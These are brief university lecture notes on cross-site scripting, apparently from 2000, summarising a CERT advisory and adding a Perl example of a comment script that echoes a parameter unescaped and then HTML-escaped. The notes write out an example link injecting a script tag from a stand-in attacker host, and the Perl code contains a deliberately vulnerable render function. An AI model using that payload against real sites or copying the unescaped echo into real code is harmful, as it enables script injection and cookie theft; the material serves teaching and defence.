Cross Site Scripting

Tom Kelliher, CS 318

Feb. 4, 2000

Administrivia

Announcements

Assignment

From Last Time

Lists & subroutines in Perl.

Outline

  1. Chapters 1-5.

  2. MinMax in Perl.

  3. Cross Site Scripting.

Coming Up

Packets.

Chapters 1-5

MinMax in Perl

Cross Site Scripting

Reference: http://www.cert.org/advisories/CA-2000-02.html

  1. Background: Browsers can execute scripts.

  2. The old, standard trojan: malicious code provided by one client for another client.

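  3. The new trojan: malicious code sent by a client for itself. The client follows a crafted link, and the server echoes the submitted code back in its response:
    <A HREF="http://www.goodguys.com/comment.cgi?mycomment=<SCRIPT 
       SRC='http://www.badguys.com/badfile'></SCRIPT>">Link to neato stuff
       from goodguys here</A>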
    
    This is what is meant by cross-site scripting.

  4. Abuse of other tags, such as <FORM>.

  5. Same-origin security model for scripting: a page sent by one source should contain only scripts from that source.

    Cross-site scripting violates this model.

  6. Impact:
    1. SSL-encrypted connections may be exposed.

    2. Attacks may be persistent through poisoned cookies.

    3. Attacker may access restricted web sites from the attacked client.
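
The echo behind the link in item 3, as an added example (not part of the original notes or of the CERT advisory): a Perl stand-in for comment.cgi that renders the mycomment parameter once unchanged and once HTML-encoded. The function names and the page template are assumptions made for illustration.

```perl
# Added example: a stand-in for comment.cgi, not code from the lecture.
use strict;
use warnings;

# Decode one application/x-www-form-urlencoded value.
sub url_decode {
    my ($s) = @_;
    $s =~ tr/+/ /;
    $s =~ s/%([0-9A-Fa-f]{2})/chr(hex($1))/ge;
    return $s;
}

# Return the first value of parameter $name from a raw query string.
sub param {
    my ($query, $name) = @_;
    for my $pair (split /[&;]/, $query) {
        my ($k, $v) = split /=/, $pair, 2;
        next unless defined $k;
        return url_decode(defined $v ? $v : '') if url_decode($k) eq $name;
    }
    return '';
}

# Encode the characters that are significant in HTML text and attributes.
sub html_escape {
    my ($s) = @_;
    my %ent = ('&' => '&amp;', '<' => '&lt;', '>' => '&gt;',
               '"' => '&quot;', "'" => '&#39;');
    $s =~ s/([&<>"'])/$ent{$1}/g;
    return $s;
}

# Vulnerable: the parameter is copied into the page unchanged.
sub render_vulnerable {
    my ($comment) = @_;
    return "<P>Your comment: $comment</P>\n";
}

# Hardened: the parameter is encoded before it is written into the page.
sub render_hardened {
    my ($comment) = @_;
    return '<P>Your comment: ' . html_escape($comment) . "</P>\n";
}

# Constructed input: the query string from the link in item 3.
my $query = "mycomment=<SCRIPT SRC='http://www.badguys.com/badfile'></SCRIPT>";
my $comment = param($query, 'mycomment');
print "Vulnerable: ", render_vulnerable($comment);
print "Hardened:   ", render_hardened($comment);
```

In the hardened output the browser displays the tag as text instead of fetching the remote script. The encoding shown covers HTML body text and quoted attribute values only.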



Thomas P. Kelliher
Fri Feb 4 12:59:19 EST 2000